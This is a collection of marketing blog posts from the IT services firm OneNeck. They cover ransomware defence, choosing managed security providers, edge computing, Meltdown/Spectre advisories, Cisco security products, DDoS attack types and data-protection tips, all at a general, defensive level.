Simply eliminating vendors is not the only solution to reducing risk. Choosing vendors strategically—and with an eye toward integration rather than simply appending boxes to endpoints—can help defenders to focus on the risks that matter most.

This might just be the perfect time for you to start addressing the need to simplify your network security and invest in more proactive, intelligent solutions that take a more immersive and comprehensive approach. At OneNeck, we’re here to help. Our security assessments, built on industry-based frameworks, can help you assess your gaps and ensure those disparate point solutions aren’t leaving you vulnerable.

Ransomware has quickly become the most profitable form malware ever seen, on its way to becoming a $1 billion annual market. Last year, the FBI reported more than 4,000 ransomware attacks occurred daily between January and June of 2016 — a 300% increase from 2015. In 2017, nearly 10% of organizations worldwide recorded some sort of ransomware activity during Q1. 

 An example of ransomware is malicious software or malware that encrypts the information on a person’s computer, such as documents, photos, and music. It will not release the files until the user pays a fee – or ransom – to unlock the files and get them back. The attacks vectors are various and wide in context. Delivered by infected ads that contain malware, by phishing messages, or by exploit kits, this malware is quickly evolving in sophistication. These infections can be catastrophic to businesses over a short or long period of time. Hospitals, public safety organizations, financial banking institutions, and retail establishments have been targeted the most.

Why it’s Surging?

 Ransomware isn’t new, in facts it’s been around for over a decade. But its recent spike is due to a few primary drivers.

1. Attack surface expansion: The proliferation of mobile devices, cloud, digitization efforts and IoT, gives cyber criminals more space to operate.

2. Better targets: Organizations are more lucrative targets for cyber criminals. They house highly sensitive data, often have thinly stretched IT departments and a high incentive to quickly settle the matter.
3. Ransomware as a Service: Just about everything is available as a service these days, including ransomware. RaaS is designed to make cybercrime accessible to anyone. Cybercriminals will author the malicious code, then make it available for others to download and use.

4. Alternative currency: Payment made in bitcoin, a cryptocurrency and a digital payment system, can’t be traced back to sender or recipient, providing an anonymous, friction-free way to collect ransoms. The risk of being caught is greatly reduced.With the rate of sophisticated ransomware attacks increasing at an alarming rate, it’s important for organizations to have a multi-layer defense strategy in place.  

With the rate of sophisticated ransomware attacks increasing at an alarming rate, it’s important for organizations to have a multi-layer defense strategy in place.  

OneNeck IT Solutions, Your Trusted Ransomware Defense Partner

At OneNeck, we recognize threats can enter the network in a variety of ways. We understand that having comprehensive protection requires a multi-tiered and pervasive approach to keep threats out as well as detect and isolate any breaches quickly. We can assess your infrastructure for its strengths and weaknesses, then recommend and implement a solution that will keep your critical data safe.

Looking for more than just ransomware defense and cybersecurity? OneNeck provides an end-to-end, technology-independent approach that includes a complete suite of hybrid IT offerings across infrastructure, applications and managed services.

Today’s consumers demand their private information remains secure. But as we learned from the 2017 breach at Equifax that exposed the personal information of 145 million, even what should be the most secure companies fall under attack.

Fearing the loss of consumer trust and revenue, senior executives demand protection against attacks like last year’s infamous WannaCry ransomware that impacted over 300,000 machines in 150 countries running outdated Windows software.

These fears and expectations are heavy burdens for IT teams that may lack the training, skills or tools to respond effectively to security breaches or prevent them from happening in the first place.

Business Security Challenges

The growing complexity and frequency of cybercrime make cybersecurity a full-time job. But at smaller companies, security is often spread among members of an over-taxed IT team or put squarely on a CIO’s desk along with hundreds of other responsibilities.

The widening IT talent gap just exacerbates the problem, with CSO reporting cybercrime will more than triple the number of unfilled cybersecurity jobs, predicted to reach 3.5 million by 2021. With cybersecurity spending expected to exceed $1 trillion from 2017 to 2021, managing costs can also be a struggle.

Benefits of Outsourcing Cybersecurity

For many overwhelmed companies, a viable solution for addressing the costs and complexity of cybersecurity is outsourcing it to a managed security service provider (MSSP). They find relief with these benefits:

1) Improved protection at less cost.

Outsourcing shifts increasing costs to providers better suited to meet them. MSSPs can spread costs across a wide client base. By scaling solutions that meet varied needs,  businesses get security protection without the attendant costs.

2) Improved efficiencies with less cost.

Outsourcing significantly expands your access to security experts while saving hiring costs. It also frees IT to work on initiatives focused on increasing your bottom line.

3) The latest developments at your doorstep.

MSSPs can bring beneficial advancements to your door. Artificial intelligence and blockchain technology show real promise in the future of security, and MSSPs are at the forefront of integrating these and other technologies into top-notch security solutions.

4) Protection around the clock.

MSSPs are incessantly vigilant in protecting all systems and access points — a nebulous undertaking as businesses maximize efficiencies in the Internet of Things (IoT).

Round-the-clock protection greatly improves threat prevention. Monitoring security across a variety of clients and industries also helps MSSPs detect new threats and risks before they develop into catastrophes.

5) Layered protection against human error.

Security providers can offer layered protection with extensive security checks and procedures that are far more likely to prevent the types of internal employee mistakes that cause massive data breaches.

Selecting the Right Security Partner

Your MSSP is a partner who helps grow your business securely. When evaluating providers, consider these recommendations:

• Make sure you feel confident in the provider’s ability to understand your business, anticipate your needs and align solutions to your goals.
• Look for a provider committed to investing in the ongoing skills and education of its employees.
• Look for expertise in transformative solutions such as cloud, big data management and analytics.
• To optimize your partnership, make sure the provider you choose can meet your expectations for communication, teamwork, transparency and leadership.

OneNeck^® IT Solutions is a trusted business partner for developing customized solutions to protect against cybercrimes. Learn more about our Virtual CISO Services.

There’s a new buzzword making the rounds (like we needed another one). Move over Digital Transformation, and welcome Edge Computing. While it’s being credited with the power to deliver speed, security and cost-savings to organizations, is it really all that? Let’s break it down…

What Is Edge Computing?

Research firm IDC defines edge computing as a “mesh network of microdata centers that process or store critical data locally and push all received data to a central data center or cloud storage repository, in a footprint of less than 100 square feet.” In other words, it involves processing data at the edge of the network where it is created, instead of routing it through data centers or clouds.

Fog Computing vs. Edge Computing

Another term related to edge computing is fog computing. It’s important to understand the distinction.

“Fog” refers to the network of connections between edge devices and the cloud, while “edge” represents what happens near or on the edge devices (the endpoints). Fog computing includes edge but uses the network to get edge data where it’s going.

What’s Driving Edge Computing?

More organizations are adopting large-scale IoT deployments with Gartner estimating enterprise use of IoT devices will grow to 7.5 billion by 2020. Transporting data to the cloud from IoT devices for management and analysis is costly, inefficient and can impact latency.

Many organizations simply don’t have the connectivity to support sending large amounts of data to and from the cloud. With its on-device approach, edge computing addresses these limitations by performing the computing and analytics on the device itself — eliminating the need for data transport.

Edge Computing Advantages and Challenges

Edge computing gives applications that rely on machine learning an advantage by increasing data process efficiencies. By doing away with the need for device-to-cloud data trips, on-device machine learning makes applications more responsive and robust. Machine-learning-driven capabilities like facial profile recognition or voice recognition is quicker and more efficient when done on-device.

By maintaining sensitive data at the source rather than sending it to the cloud, edge computing also offers security advantages. The less data in various locations, the fewer the opportunities for cybercriminals to access it and compromise it. Countering this is the argument that the vulnerability of edge devices to compromise is a risk to data kept at the edge.

The takeaway here is that mitigating IoT security risks requires work, planning and vigilance. A good IoT strategy includes a robust plan for keeping your system secure.

According to the Hewlett Packard Enterprise study, The Internet of Things: Today and Tomorrow, eighty-four percent of IoT adopters say they have experienced at least one IoT security breach with malware, spyware and human error the most common culprits. Ninety-three percent of executives expect IoT security breaches to occur in the future.

How do you build an IoT strategy that drives the speed to market you desire but simultaneously keeps your data safe? Simple – an upfront strategy that takes into considerations the inherent risks is a must. At OneNeck, our security team is ready to help you assess your security risk and work with you to develop a realistic strategy to keep you secure and get the most from your data on the edge.

OneNeck IT Solutions, along with other technology companies across the country, have learned of a potential flaw that could allow hackers the opportunity to access portions of memory within your CPU processor.

Currently, there are no known exploits. Our team is actively investigating this matter and working closely with our vendors to understand the situation and formulate a strategy that protects our customers against this vulnerability.

For the best protection, please continue to use and follow good security practices that protect against malware and confirm your malware is fully up-to-date. In general, this will help protect against possible exploitation. For our managed services customers, rest assured, we are vigilantly monitoring your infrastructure and working to keep it safe.

We will provide an update tomorrow at 3:30 p.m. central, sooner if more information becomes available.

For additional information:

https://newsroom.intel.com/news/intel-responds-to-security-research-findings/

https://www.theregister.co.uk/2018/01/02/intel_cpu_design_flaw/

Update #2 on Meltdown and Spectre CPU vulnerability

January 4, 2017

OneNeck IT Solutions, along with other technology companies across the country, continues to evaluate the Meltdown and Spectre CPU vulnerably. There are no known exploits at this time.
 
We are working with our vendors to help protect our customer’s virtual infrastructure environments and are in the process of hardening our infrastructure with their guidance.
 
Operating System (OS) vendors are beginning to release some patches for this vulnerability. We are reviewing these patches as they’re released. We plan to follow our normal roll-out process for applying these updates. At this time it appears unsupported legacy operating systems will not be receiving a patch from vendors for this vulnerability.
 
Future updates will be provided, as appropriate. Please continue following security best practices against malware and reduce internet browsing from servers, as much as possible.
 
For additional information: https://meltdownattack.com/

A look inside many of today’s SOCs will show stressed out security teams who are spending more time responding to emergency issues than they are developed strategies to improve their security ecosystems.

Security teams typically rely on reactive tools that lack the visibility they need to effectively and proactively strategize for emerging security challenges. Most SOCs are struggling with operations challenges, which has given rise to Everything-as-a-Service.

the lack of skilled staff needed to navigate through the complexities of a modern network. By 2021, more than 3.5 million cybersecurity jobs need to be filled. It is also predicted that cybercrime will increase at a rate three times faster than jobs, which will inevitably result in increased spending on security.

Managed security service providers (MSSPs) offer much-needed solutions, but how do you choose the most reliable MSSPs to monitor, manage and get ahead of threats to your business?

7 Points to Evaluate When Choosing an Managed Security Services Provider

1.  A mixed bag of services: Your business risks are unique, as is your budget. In order to deliver the most in-depth security coverage, you should look for providers that offer a wide range of services, provide multiple service levels, give you the ability to mix and match and have prepackaged offerings.
2.  Align intelligence: Make sure your MSSP does more than monitoring and device management. Look for providers whose services align with your security initiatives and deliver integrated security intelligence that aligns with IT infrastructure and back-end technology.
3.  Dedicated research resources: Extensive internal and external resources that deliver insight on the latest threats, vulnerabilities and strategies for remediation are strong indicators of a mature MSSP.
4.  Solid reputation with vision: As with any service provider, customer satisfaction tells an important story. Review analyst reports and understand the provider’s vision for the future as well as the actions they are taking to ensure their direction supports your security goals.
5.  Infrastructure and integration: You’ll get more value from an MSSP that offers integrated technology services and demonstrates a deep understanding of security best practices related to hardware, software, data center and network requirements.
6.  Manage beyond its own suite: To avoid the future cost of technology changes, make sure your MSSP can protect your existing investments by requesting a list of platforms the provider is certified to manage.
7.  Sustainable, stable resources: A sustainable business model demands significant resources that will ensure financial stability. A successful MSSP has the resources and capabilities to invest in new technologies and attract highly skilled staff.

Defending against today’s threats demands an MSSP that can help you reduce risk with a higher level of efficiency. With industry-leading technology, OneNeck’s security controls deliver operational excellence and compliance through rigorous, flexible and accessible management services. Contact us to learn more about our managed security services. 

Long gone are the days of yore, when IT administrators slept like babies, content that their company desktops, business apps and critical infrastructure were all tucked in safe, securely located behind a firewall. Today, an enterprise user is spending more time outside the safe haven of the network’s security and roaming on other networks in the big, terrifying world.

EEK!

By 2021, Gartner predicts the average company will have 25% of its corporate data traffic bypassing the network perimeter. 25 percent! So, a quarter of the time, enterprise users will be opening themselves (and the business) to serious risk, meaning the traditional approach of “secure the perimeter” is likely to fail, opening the door for malware, ransomware and other malicious attacks.

DOUBLE EEK!

So, what is an IT professional to do to get a good night’s sleep? Well, it’s time to think beyond the perimeter…

Expanding Security to the Great Outdoors
So, how do you protect your mobile workforce from anywhere they access the Internet? Let’s talk Cisco Umbrella.

Cisco Umbrella is a cloud-based gateway, based on technology from OpenDNS and other acquisitions (i.e., CloudLock), as well as existing Cisco security services that together secure business access to resources outside the perimeter, even when users are not using a VPN. As a Secure Internet Gateway, Umbrella provides the first line of defense against threats on the Internet wherever users go. The key comes down to visibility into any activity in all locations and on all user devices, and blocks threats before they ever reach the corporate network.

But how does it work?

When a user clicks a link or types a URL, a DNS request is initiated which maps domain names to IP addresses, and that begins the process of connecting a device to the Internet. Using this process, Umbrella uses intelligence to determine if the request is safe, malicious or risky. Safe requests are routed on, and malicious requests are blocked. If there’s a questionable request, it is routed to a cloud-based proxy for deeper inspection to see if it’s malicious. Attempted file downloads from those questionable sites are also examined using anti-virus engines and Cisco Advanced Malware Protection (AMP). Once it’s determined to be safe or malicious, the connection is allowed or blocked. 

Another cool Umbrella feature is that because it’s constantly analyzing Internet activity and resolving billions of requests from around the world, which it then stores in a massive database, it’s also learning as it goes. This means it can proactively block requests to destinations it’s already learned are malicious, keeping users safe from phishing and malware infections before it happens, which means IT can sleep knowing their users afar are protected.

But, any experienced IT professional is going to ask, does Umbrella integrate with my existing security tools? Yep! Integration with your existing security stack (i.e., security appliances, intelligence platforms and cloud access security broker controls) is part of the solution. Log data regarding Internet activity is pushed to your SIEM or log management systems via an API, enabling Umbrella to block malicious domains as an extension of your current security tools.

Next question any IT professional is going to ask: How complex is it to set up? Since Umbrella’s delivered via the cloud, there is no hardware to install or update, and provisioning is done in minutes on all on-network devices (including BYOD and IoT), and you can use your existing Cisco footprint — AnyConnect, Integrated Services Router (ISR) 4K Series, and Wireless LAN Controller 5520 and 8540 — to quickly provision thousands of network egresses and roaming laptops.

So, if you’re looking for a solution that will keep your users safe outside the perimeter in the big, scary world of malicious sites, consider what Umbrella can do for you. You can’t control everyone on the outside, but you can sleep better knowing that they’re protected, and in turn, so are you.

As a longtime Cisco partner, we’ve been a part of many Cisco Identity Services Engine (ISE) implementations and upgrades, giving us first-hand knowledge of not only how ISE helps our customers meet enterprise mobility challenges, but also gleaned some insider tips and tricks on how best to execute upgrades.

I recently sat down Josh Gross, a OneNeck security engineer, to discuss Cisco ISE and some of the challenges he’s seeing customers face when upgrading.

What is the latest version of ISE, and what are some of the new features and benefits associated with the newest release?

The latest version of ISE is version 2.2. It offers some refinements on ISE 2.1 with an ability to detect MAC spoofing and enhancements to the migration tool for users looking to migrate to ISE from legacy TACACS. They’ve also done some interesting things with guest access, including wireless guest portal provisioning available through a wizard in the ISE console, which will even configure the wireless LAN controller. It also supports JSON for new APIs which can add new scripting functionality.

When and why would a company need to upgrade their ISE deployment?

ISE is frequently implementing new features and functionality, and our customers usually upgrade for one of those features. In the 2.0 update, they included the ability to configure TACACS access in ISE. Most ISE 1.x customers are paying licensing for a separate TACACS solution, and they frequently upgrade when they are ready to move their TACACS to ISE.

What are some key factors that could affect their upgrade time?

The primary factor in the length of time it takes to upgrade an ISE solution is the number of ISE servers deployed. For scalability, ISE can be set up in a multi-server configuration with different ISE servers providing different functions or ‘personas’ (administration, monitoring, policy service). The ISE upgrade process upgrades the servers serially to minimize downtime.

Once in flight, what are some of the challenges you’ve seen during the upgrade process?

The challenges during the upgrade processes are usually related to the ISE configuration. Frequently I see an upgrade complete successfully, but I will have to disconnect and re-connect to third-party authentication systems such as Active Directory for them to begin functioning.

Sometimes, in multi-server deployments, some servers in the infrastructure will not upgrade successfully. If that happens, you can generally rebuild the server as a new node and re-join the cluster.

Any Troubleshooting tips you might have for the most common upgrade failures?

I always ensure to take an operational backup prior to trying an upgrade. It helps if everything fails and I have to restore. If ISE is implemented using virtual machines, I recommend taking a snapshot as well. I also plan for a service outage during the upgrade, because servers usually need to be rebooted and issues occasionally occur.

Keep in mind that, in a lot of cases, you can save time rebuilding a node rather than trying to troubleshoot what failed during the upgrade. ISE should always have at least a primary and secondary node and as long as one of the nodes is functional, the others can be rebuilt and re-joined.

LEARN MORE About ISE: Healthcare Has an Identity Problem

Malware is a broad term that encompasses any form of software designed to damage, steal or corrupt data. Ransomware, trojans, worms and rootkits are common malware examples, but the list is far more exhaustive, making fighting malware a normal part of operations for SMBs and corporations alike.

A recent cybersecurity report indicates that more organizations are coming under attack with very costly consequences. One in three businesses hit with malware in 2016 experienced a 20 percent or more revenue loss. A separate report found that one in five companies targeted by malware will go out of business (this is especially true for SMBs). Despite the documented and highly publicized threatscape, 90 percent of companies invested more heavily in IT security in the aftermath of a breach.

Five Ways to Mitigate Risk Now

Being proactive against malware isn’t just a good idea, it’s a business imperative mandated by due diligence and compliance, and five steps outlined in Cisco’s report. In this white paper, Cisco advises:

1. Fortify the Perimeter
   Address threats as close to the network perimeter as possible to prevent malware from reaching endpoint devices. Implement a network-based security solution to utilize cloud and onboard sandboxes for evaluating potential threats.
2. Protect Inside the Network
   Choose advanced protection that looks for malware on network segments that store sensitive technology assets.
3. Protect the Endpoints
   Ensure strong defense at each endpoint, and don’t rely on perimeter security for blocking all threats. Endpoint protection must include personal devices, even those not connected through the company network.
4. Analyze Threats
   Keep track of all egress traffic for exfiltration of sensitive data. Command-and-control traffic should also be analyzed for signs of a compromised device.
5. Quarantine Malware and Prevent Reinfection
   Quarantine and clean infected devices. Track every file on every device to identify patient zero (the first infected victim) and ensure all subsequent infections are cleaned.

Keeping Your Endpoints Protected with One Tool

One cannot begin addressing the threat landscape without considering the risk endpoints bring into an organization. But it can get murky understanding where endpoint protection (EPP) and endpoint detection and response (EDR) begin. Garter recently pointed out that, “by 2019, EPP and ER capabilities will have merged into a single offering.” This a positive for our customers, as it provides a comprehensive set of capabilities within one platform, eliminating the need to manage two different solutions. Enter Cisco Advanced Malware Protection (AMP).

Cisco’s AMP combines malware detection, malware prevention and malware protection all in one. It introduces the latest in global threat intelligence and advanced sandboxing for keeping the most sophisticated malware at bay by:

• Delivering unmatched global threat intelligence to strengthen front-line defenses
• Providing deep visibility into the origin and scope of a compromise
• Rapidly detecting, responding to and remediating malware
• Preventing costly reinfection and remediation scenarios
• Streamlining protection everywhere—network, endpoints, mobile devices, email and web—before, during and after an attack

AMP has been researched by Tech Validate, and its findings speak for itself:

• 86 percent of users agreed AMP for endpoint protection increased their security effectiveness.
• 88 percent of users believed AMP detects threats faster than other security solutions.
• 72 percent believed AMP accelerated overall incident response rate.

AMP has been used by industries all over the globe. Prominent users include Georgetown University, Yokogawa Electric Corporation, TMB Bank Company, HCL Technologies and even the Saudi Arabian National Guard.

The threat of malware requires robust security designed to combat it, and AMP is a powerful tool for threat remediation. Not sure if Cisco AMP is a right fit for your security strategy? Contact one of our security experts to discuss your security profile and better understand the gaps that are putting you at risk. Now is the time to plan – not after the attacker is inside.

LEARN MORE: Understanding a CIO’s Role in Cybersecurity

Digital transformation is disrupting the old ways of doing business by introducing digital technologies into the workplace and enabling employees to perform tasks in more efficient and productive ways, which in turn brings exponential new opportunity for business growth.

However, with digital transformation comes risk. The devices, software and technologies that are transforming your business need to be protected from hackers, insider threats and other cyberattacks. While digital transformation is reshaping the way companies do business, it is also forcing companies to reshape the way they approach their security.

Security Risks in the Digital Transformation
Protecting networks and data is a top priority of IT departments today. A single data breach or security incident can destroy an organization’s reputation, and the financial costs can shutter a small business.

But the truth is, security can be difficult to ensure because there are so many variables involved, and the digital environment is constantly changing. Users make mistakes that can harm under-protected systems, so applications need to be consistently updated and patched to prevent hackers from sneaking through new vulnerabilities.

And then there is the ever-increasing number of endpoints and applications attached to the network. Estimates show most employees used at least five devices in 2016 to access corporate data. With Bring Your Own Device (BYOD), many employees are using their personal devices and favorite applications to conduct work, often without permission or knowledge of the IT department. While all of these endpoints and applications improve worker productivity, they create a potential nightmare scenario for security.

Rethinking the Approach to Security
Overall cybersecurity spending is expected to hit $90 billion this year, with many organizations increasing their budgets to fight against mounting threats. However, traditional approaches to security aren’t as effective as hackers become more sophisticated and find ways to circumvent legacy security methods.

To counter the increasing stealth and persistence of modern cyber threats, organizations need to shift to a more holistic approach to cybersecurity. The holistic approach integrates technology with human behaviors and physical considerations and recognizes that security incidents go beyond simply dumping malware into a network.

They require a human to plan the attack and a human to make a mistake; they also factor in location or industry, or in some cases, something as simple as dropping an infected USB flash drive on someone’s desk in hopes of them plugging it into the company network. By looking at the overall picture of how cyber threats happen, you can better map your security plan to address them. But effective cybersecurity takes a very tactical approach to win the battle. Our partner, VMware, recommends taking these tactical steps in an effort to start building a defense:

• Simplify security models by replacing ad-hoc, poorly coordinated systems with collaborative, unified architectures that deliver protection efficiently and effectively.
• Implement a ubiquitous software layer across the application infrastructure and endpoints to abstract infrastructure from the applications running on it.
• Gain more visibility and context to more fully understand interactions between users, applications and data to better pinpoint security vulnerabilities and align security controls and policies to applications.

The digital transformation has opened doors for many businesses to thrive and is creating opportunities never seen before. But as you rely on more applications and endpoints to access your network, the threat level rises.

By rethinking your security approach, your business becomes better equipped to meet new threat challenges. A good starting point is working with an IT solutions company like OneNeck to establish a plan that protects your applications, infrastructure and endpoints. With this in place, you can improve visibility into your company’s digital interactions and better protect your most sensitive holdings.

Distributed Denial of Service (DDoS) attacks aren’t like other types of cyber-attacks. They don’t spread malware into your network, and they don’t directly hijack sensitive data or steal from bank accounts. However, the financial and reputational damage caused by DDoS can be devastating to your business. They are also one of the most difficult types of cyber-attacks to defend against.

DDoS Attacks are Easy and Inexpensive to Launch

Hackers use the DDoS attack vector because it is easy, cheap and effective. Many target Domain Name Servers (DNS), a core application essential to website accessibility. Groups like Anonymous use DDoS attacks as political statements, purposely disrupting web traffic as a form of protest. Hackers also use DDoS as a diversion, putting attention on the shuttered websites while proceeding with a more devastating cyber-attack elsewhere in the system.

DDoS attacks have increased 85 percent in each of the past two years. The costs of a DDoS attack are skyrocketing, as well, costing companies more than $2 million every time they are hit. Hackers are also taking advantage of new technology. In 2016, they infected Internet of Things (IoT) devices with the Mirai botnet, which, when activated, overwhelmed DNS provider Dyn and took down hundreds of popular websites.

3 Common DDoS Attacks

Hackers have a variety of methods to deploy DDoS attacks, but most cybersecurity experts put the attacks into three classifications:

• Volumetric – The goal of volumetric attacks is to overwhelm an organization’s bandwidth so others can’t access it. The most common DDoS attack in this category is the User Datagram Protocol (UDP) Flood. Volumetric attacks make up the majority of DDoS attacks.
• Protocol – Protocol attacks focus on weaknesses in the protocol. SYN Flood, which targets the way systems “speak” to each other to open connections, is the most widely used of these attacks.
• Application – Application attacks hit weaknesses in specific applications rather than target the entire server. Focused on exploiting vulnerabilities in individual applications, these attacks use fewer resources than other types. Slowloris is a popular type of application attack, targeting web servers.

Mitigating DDoS Attacks

According to a study by Neustar and Harris Interactive, nine in ten companies are bumping up their DDoS defenses in the next year in response to the rise in attacks. While it is next to impossible to prevent DDoS attacks, there are steps organizations can take to make it more difficult to completely disrupt a website. As Rachel Kartch explained in an SEI blog post, the following four steps will help you mitigate a DDoS attack:

1. Ensure the architecture is resilient by dispersing data assets in multiple locations and networks. This allows for business continuity in any type of disaster.
2. Use hardware, like firewalls and load balancers, validated for their ability to block or mitigate DDoS attacks.
3. Scale up bandwidth as much as you can afford. The more bandwidth available, the more likely you can slow down if not stave off an attack.
4. Outsource DDoS security to a provider experienced in dealing with these attacks.

DDoS attacks are hard to defend or anticipate. It’s vital to build a DDoS attack plan of action into any security policy, but it is equally important to have the tools in place to limit any outage.

With our comprehensive security services, OneNeck’s security experts can custom-tailor a security solution specific to your exact business needs, helping you secure and mitigate threats to your applications and infrastructure.

LEARN MORE:


Q&A with a Security Executive, OneNeck’s Katie McCullough Vice President, Information Security & Business Applications

Ransomware was big business last year, estimated to have grossed cybercriminals $1 billion. More than half of US companies experienced a ransomware attack in 2016, and the threat continues to be a major concern for organizations.

 WannaCry, the massive ransomware attack that quickly spread across 150 countries and infected more than 300,000 computers in May, was stopped relatively quickly. But even weeks after a security researcher deactivated the attack, the same malware strain continued to scan networks and look for the same vulnerabilities.

With ransomware virus threats continuing to grow, this will continue to be at the top of mind for IT. But what about your organization? Are you sure you’re doing everything you can to protect your business from a ransomware virus?

How Ransomware Works

A ransomware infection often starts with an exploit kit that identifies software vulnerabilities, such as unpatched security flaws on endpoints. The exploit kit may be delivered through a phishing email containing malicious attachments or links. In the case of WannaCry, the culprit was not phishing, but rather, a set of NSA cyber espionage tools leaked by the secretive group, the Shadow Brokers.

After the initial payload exploits a system and analyzes its environment, the ransomware is delivered and a “callback” is made to the ransomware infrastructure to retrieve keys for encrypting the endpoint.

Once a computer is compromised, the user cannot access its contents without paying a ransom or restoring the system from a backup. But a backup in and of itself is not enough to fully protect systems against a ransomware infection. A comprehensive ransomware defense strategy includes:

1. Backing up all data. Make sure your data is not only backed up regularly, but also has a system-state backup or snapshot.
2. Patching systems regularly. Ransomware attackers frequently target systems running outdated software with known vulnerabilities. Patching software vulnerabilities as soon as fixes are available is the best way to prevent your system from being exploited. Case in point: Microsoft created a patch available for the vulnerability exploited by WannaCry months before the attack.
3. Educating employees. The weakest link in a security defense is human. Educate users on various social engineering threat techniques —like phishing, for example — to protect them from falling prey.
4. Layered security. A layered security approach with technology such as next-generation firewalls and intrusion prevention systems (IPS) removes single points of failure, enabling you to enforce security measures at multiple areas of your network.
5. Network segmentation. Limiting the resources attackers can access will help protect your network from a broader infection.
6. Monitor network activity. You need visibility to know what to protect.
7. Protect endpoints. In the age of BYOD, cloud computing and the IoT, you need a solution that gives you visibility into the security of all devices that connect to your network.
8. Use real-time threat intelligence. Big data-driven threat intelligence arms you with knowledge about real-time threats, enabling you to proactively defend your organization.

Check Out Cisco’s Ultimate Checklist to Preventing and Fighting Ransomware Attacks

In addition to taking these steps, it helps to work with an experienced IT security solutions provider, like OneNeck, with the skilled resources to keep up with constant changes on the ransomware landscape and technology to bolster your defenses.

Today’s CIOs must achieve a delicate balance between meeting business objectives and providing security for their most critical data and systems. As more organizations migrate operations to the cloud, cybersecurity is a critical consideration, but there are many other components to consider as well. If your business needs to meet compliance regulations such as PCI DSS, CERT, FINRA and HIPAA, you must have the structure in place to ensure you can pass audits. So, while security needs to be a major factor when evaluating cloud providers, it’s important to understand all of the parameters that play a part.

Risk, security, and compliance in the cloud

The successful businesses of yesteryear were built on legacy and on-premises data centers, posing challenges to modernizing systems. As these systems reach their end of lifecycle, IT departments are receiving more requests from senior executive to migrate to the cloud and replace or integrate existing systems in the interest of cost efficiency and business agility.

But, according to a survey by ESG, more than 85% of senior IT executives migrating to the cloud are concerned or very concerned about cloud security. Whether it’s from malicious intent, politically motivated or an insider mistake, significant security challenges persist including:

• Attacks are becoming more frequent and more sophisticated
• Readily available toolkits make it easy for low-level hackers to launch sophisticated attacks such as ransomware and other malware
• Mobile devices have significantly increased the attack surface, and number of endpoints that need protection has grown exponentially
• The pace of application change and system updates are difficult to keep up with to close vulnerabilities

The role CIOs must play to ensure cloud security

The CIO’s primary objective is to meet business goals such as improving customer experience, organizational agility, and optimizing new digital revenue streams. But none of this can be accomplished without a secure infrastructure.

In the cloud, the protection of data operates on a model of shared responsibility model where both cloud providers and users share the burden of ensuring security and meeting compliance mandates. But the ultimate responsibility for security lies within your organization and those who will have to answer to the boardroom in the event of a breach.

Who owns cloud security?  Find out in this informative ebook.

The cloud model your organization employs, public, private or hybrid, will determine the level of security provided by your cloud provider. Organizations have more extensive responsibilities for Infrastructure as a Service (IaaS) and Platform as a Service (PaaS) as compared to Software as a Service (SaaS) applications. With IaaS and PaaS, the risks include the potential cessation of business operations, failing a compliance audit, or being hit with a security breach.

Key security considerations for cloud migration

CIOs must take steps to ensure security during the cloud migration process. Here are some questions to ask when evaluating cloud providers:

• Will my cloud infrastructure use least privilege policies for data access without compromising security?
• Are applications or platforms designed with built-in security features such as an enterprise identity management system?
• How will we encrypt data in motion or at rest during the migration process and beyond?
• What third-party compliance standards must be met, and how does a cloud provider’s security protocols map to industry standards?
• How does the cloud provider document its security for compliance purposes?

Once you understand your requirements in the context of cloud offerings, you will be in a better position to implement security protections.

OneNeck IT Solutions understands that maintaining data security in the cloud is a complex undertaking. Our industry experts can help protect your resources from incurring outages and your data from exfiltration through proper design, system segmentation, and access control. Contact us to learn more.

Loss Prevention and Protection

As a result of a digital economy, the IT landscape is changing before our eyes. Cloud, big data, social and mobile have accelerated the pace of business like we have never seen. We see the Internet of Things (IoT) expanding at a prolific pace — with the expected market to reach $1.7 trillion by 2020. Advanced robotics, automation and artificial intelligence (AI) are quickly adding to the mix, and regulations for governing all this growth haven’t really caught up.

As we have seen from the increasingly high profile breaches, when these advancements move faster than IT can keep up, vulnerabilities increase. The costs of a breach are rising, and as new legislation and compliance mandates are created, the penalties for noncompliance are increasing as well. The c-suite is on edge, and the conversations in the boardroom have turned to questioning IT practices and policies for data security, encryption, network security and endpoint protection. It is critical to remain vigilant as data breaches become a daily threat.

The following 10 data security tips are not fail-proof, but they will reduce vulnerabilities, increase data protections, and improve your ability to respond and recover should you become a cybersecurity victim.

1. Inventory Data

You need to know where your sensitive data resides in order to protect it. It’s critical to monitor this data for unusual activity that would alert you to possible suspicious activity. Understanding what data is most important will also help you to remediate and recover faster in the event of a breach.

2. Use Encryption

Data needs to be encrypted in motion or at rest whether on servers, laptops, tablets or smartphones. Encryption is mandatory to comply with industry regulations and protects your organization so that if your data falls into the wrong hands it will be useless to them.

3. Segregate Data

Sensitive data should be isolated from data that has a lower risk profile. Place higher protections around sensitive data and insure that if a breach takes place, the hacker is unable to gain access to the company’s crown jewels.

4. Enact a Mobile Device Action Plan

It was reported that 74% of companies allow employees to use their personal devices for work-related purposes, according to Tech Pro Research. Set policies in place to stop employees from storing sensitive company data on devices, require device password protection and data encryption, and require security apps to be installed. Educate employees on reporting procedures and institute remote wipe in the case of lost or stolen equipment.

5. Set Backup Procedures

Critical data should be backed up daily and in the case of critical transactional data, even more frequently.  Make sure backups are accessible at the time of a breach, and practice backup and restore features to ensure your ability to quickly recover.  Some data may also need to be stored offsite and offline to protect its integrity.

6. Secure Your Wi-Fi

Hackers are looking for ways into your network, and your Wi-Fi is a vulnerability. There are several policies that need to be put in place to lower your risk, such as monitor the network for intrusions, use Wi-Fi encryption protocols, change default passwords, control signals, as well as implement Wi-Fi security tools.

7. Employ Least Privileges

No single employee, whether a systems administrator, a marketing admin or the CEO should have access to all your data. Employ least privilege policies so that employees are only allowed to access the data they need to do their job. Staff should also not be allowed to install any software or make any system updates without authorization.

8. Institute Strong Password Policies

While there are many ways to break into your systems, stolen passwords still present a big threat. Policies such as two-factor authentication, complex passwords, and frequent password updates go a long way to ensuring credentials are useless if they fall into the wrong hands. Policies should mandate changes to hard-coded and default passwords that pose a great risk, especially with IoT devices.

9. Vet Cloud Vendors, Managed Service Providers and Colocation Facilities

While these vendors are your partners in keeping your organization operational and safe, don’t go in blind. Do an assessment of your current infrastructure needs and use that question how the provider will address your unique data scenarios and security needs. A true partner will work with you to ensure that your needs are met with the expertise you need.

10. Be Prepared

The worst-case scenarios need to be practiced and responses perfected. Create a playbook that outlines all policies and procedures that need to be enacted in the event of a data breach or cyberattack. How will you respond to ransomware? What will you do if a device is stolen? How will you know if data is being extracted at 3 am? Don’t be caught off-guard.

